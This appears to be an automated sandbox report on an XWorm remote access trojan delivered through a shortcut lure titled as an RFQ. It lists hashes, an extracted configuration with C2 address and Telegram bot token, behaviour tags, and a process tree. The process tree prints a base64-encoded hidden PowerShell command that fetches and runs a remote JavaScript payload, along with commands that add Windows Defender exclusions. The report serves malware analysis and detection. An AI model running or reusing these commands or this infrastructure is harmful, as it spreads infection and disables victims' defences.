Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2024 05:07

General

  • Target

    Saturday Nov 16 RFQ 120HQ.lnk

  • Size

    215KB

  • MD5

    614423a0f5b8a21a0ae2d957b46cef3c

  • SHA1

    529c5271a1b4cef778dc48b2dd6edfeddd24c38c

  • SHA256

    506db308fda3797a3474eab41654ba925cd3ba3582f638b92400ba3767294de6

  • SHA512

    6dd13c5927b99c804e20ed0412d7279c40ddbce7c626e536c2d4a11e6455203c82780db5d53fda5552fdf590633c76e83c0c6aaaf83e3c2d528e9e5a59298af4

  • SSDEEP

    6144:M+HZ4aKBKefy7xCfE2CQT7FSwehrQWatIJEr0a6NQ:M+mGwy70fHCQThS9Z2aaMQ

Malware Config

Extracted

Family

xworm

Version

5.0

C2

185.162.75.19:7000

Mutex

AyJZQz7cchpO5oie

Attributes
  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot6460930418:AAGMLktYHOrDqJ5cDoT5GtLWliQfxKax0DI/sendMessage?chat_id=6746471576

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Saturday Nov 16 RFQ 120HQ.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$6VcZuEYj = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC93VkVQei5wZGYgLU91dEZpbGUgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO1N0YXJ0LVByb2Nlc3MgJGVudjpURU1QXFNhdHVyZGF5IE5vdiAxNiBSRlEgMTIwSFEucGRmO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvdHdCa1guanMgLU91dEZpbGUgJGVudjpURU1QXGFVSXFLcC5qcztTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxhVUlxS3AuanM7JGNsPSdNU093U0YnOyRjbD0nTVNPd1NGJztFeGl0';$ZSr2rv13TMa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($6VcZuEYj));Invoke-Expression -Command $ZSr2rv13TMa"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aUIqKp.js"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3720
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4844
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:688
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3424
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'aspnet_regbrowsers.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2256

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ba7bb8c22d72f7d6094bf4b7a11fd2df

    SHA1

    e68eab39081c17997a16bca1667f1544f11804a5

    SHA256

    0b479a9a243e4fa548d64277229f3c72cc7c6773001a235fc406c74e98d32b1a

    SHA512

    58288cb73c35eb08b28f9ad0e96ed17e89b6e361c015c233deba9eb39a928e7216576c897bed531625171606ff9952361c40b14df27c0aa7e2e68228aeb0de4c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    dd4af1720f7c5e585e45ad97dc8044ef

    SHA1

    af48a3b58ab0c475ea7d623eab4ab783ef44ab06

    SHA256

    aef38821f2e2774a27a0e59a490ecb876cfd73f366281e6a386d0feb6420d041

    SHA512

    45914d84dac6c8a6f94cdfecb88d2fe8e3c1802fc7166d9ef6171b5700f997d1853085d97f44d482ac314d525e380ae82e9dab823c5f95b9555f18b37e0380ae

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtq1dsbq.jr5.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\aUIqKp.js

    Filesize

    199KB

    MD5

    4ceb1057e744898bc02ffe2a9daa061a

    SHA1

    ccc89e9d665bc204347fbc7346957ed65ef983ba

    SHA256

    d2c8b31ed90c86ec267b673178ce22b36096ff8d705cbf9b5fa8ed4bac87550b

    SHA512

    3a71dba04527b03bb0ee1384f92b33eaa3de7bb3f1521997fd3151ef9ce553bfb5608054919b37c35f0f6f611acf59805949e586e52e3ca2cfc85e57f246c87a

  • C:\Users\Admin\AppData\Roaming\UPDATE.ps1

    Filesize

    196KB

    MD5

    67ea1d562d1ed27916829a569dbc7fb5

    SHA1

    7d083620f91219c67b7e0a2925a3cb8c987d00ee

    SHA256

    61b54b21f003b1133e63b76fe99a0750303e17a7cc93ea4535c5533b028b1781

    SHA512

    5d03188a7e5e3fd5f9702b9ac2255cc8d5f23dc0d101f5ffb84d411d0c89021af704383f8f2ee88af3a696a7576b8a338fa4140d9396ff6a6e299f1b511d39b4

  • memory/688-39-0x000000000BA90000-0x000000000BAA6000-memory.dmp

    Filesize

    88KB

  • memory/688-108-0x0000000005720000-0x0000000005CC4000-memory.dmp

    Filesize

    5.6MB

  • memory/688-109-0x00000000053A0000-0x0000000005432000-memory.dmp

    Filesize

    584KB

  • memory/688-42-0x00000000049E0000-0x0000000004A7C000-memory.dmp

    Filesize

    624KB

  • memory/688-41-0x000000000BA90000-0x000000000BAA2000-memory.dmp

    Filesize

    72KB

  • memory/688-110-0x00000000054E0000-0x00000000054EA000-memory.dmp

    Filesize

    40KB

  • memory/1028-2-0x00007FFB497F3000-0x00007FFB497F5000-memory.dmp

    Filesize

    8KB

  • memory/1028-17-0x00007FFB497F0000-0x00007FFB4A2B1000-memory.dmp

    Filesize

    10.8MB

  • memory/1028-15-0x00007FFB497F0000-0x00007FFB4A2B1000-memory.dmp

    Filesize

    10.8MB

  • memory/1028-24-0x00007FFB497F0000-0x00007FFB4A2B1000-memory.dmp

    Filesize

    10.8MB

  • memory/1028-16-0x00007FFB497F0000-0x00007FFB4A2B1000-memory.dmp

    Filesize

    10.8MB

  • memory/1028-3-0x00000265E32D0000-0x00000265E32F2000-memory.dmp

    Filesize

    136KB

  • memory/1028-9-0x00007FFB497F0000-0x00007FFB4A2B1000-memory.dmp

    Filesize

    10.8MB

  • memory/1028-14-0x00000265E3450000-0x00000265E3494000-memory.dmp

    Filesize

    272KB

  • memory/2256-97-0x000000006FEC0000-0x000000006FF0C000-memory.dmp

    Filesize

    304KB

  • memory/2256-91-0x0000000005C60000-0x0000000005FB4000-memory.dmp

    Filesize

    3.3MB

  • memory/3424-61-0x0000000006E90000-0x0000000006EC2000-memory.dmp

    Filesize

    200KB

  • memory/3424-79-0x0000000007E20000-0x0000000007E2E000-memory.dmp

    Filesize

    56KB

  • memory/3424-59-0x00000000068D0000-0x00000000068EE000-memory.dmp

    Filesize

    120KB

  • memory/3424-62-0x000000006FEC0000-0x000000006FF0C000-memory.dmp

    Filesize

    304KB

  • memory/3424-72-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

    Filesize

    120KB

  • memory/3424-73-0x0000000007AC0000-0x0000000007B63000-memory.dmp

    Filesize

    652KB

  • memory/3424-74-0x0000000008240000-0x00000000088BA000-memory.dmp

    Filesize

    6.5MB

  • memory/3424-75-0x0000000007BF0000-0x0000000007C0A000-memory.dmp

    Filesize

    104KB

  • memory/3424-76-0x0000000007C50000-0x0000000007C5A000-memory.dmp

    Filesize

    40KB

  • memory/3424-77-0x0000000007E80000-0x0000000007F16000-memory.dmp

    Filesize

    600KB

  • memory/3424-78-0x0000000007DF0000-0x0000000007E01000-memory.dmp

    Filesize

    68KB

  • memory/3424-60-0x0000000006960000-0x00000000069AC000-memory.dmp

    Filesize

    304KB

  • memory/3424-80-0x0000000007E30000-0x0000000007E44000-memory.dmp

    Filesize

    80KB

  • memory/3424-81-0x0000000007F40000-0x0000000007F5A000-memory.dmp

    Filesize

    104KB

  • memory/3424-82-0x0000000007E70000-0x0000000007E78000-memory.dmp

    Filesize

    32KB

  • memory/3424-57-0x00000000062E0000-0x0000000006634000-memory.dmp

    Filesize

    3.3MB

  • memory/3424-47-0x0000000006270000-0x00000000062D6000-memory.dmp

    Filesize

    408KB

  • memory/3424-46-0x0000000006200000-0x0000000006266000-memory.dmp

    Filesize

    408KB

  • memory/3424-45-0x0000000005A20000-0x0000000005A42000-memory.dmp

    Filesize

    136KB

  • memory/3424-44-0x0000000005B60000-0x0000000006188000-memory.dmp

    Filesize

    6.2MB

  • memory/3424-43-0x0000000002F90000-0x0000000002FC6000-memory.dmp

    Filesize

    216KB

  • memory/4844-38-0x00000291D7510000-0x00000291D753A000-memory.dmp

    Filesize

    168KB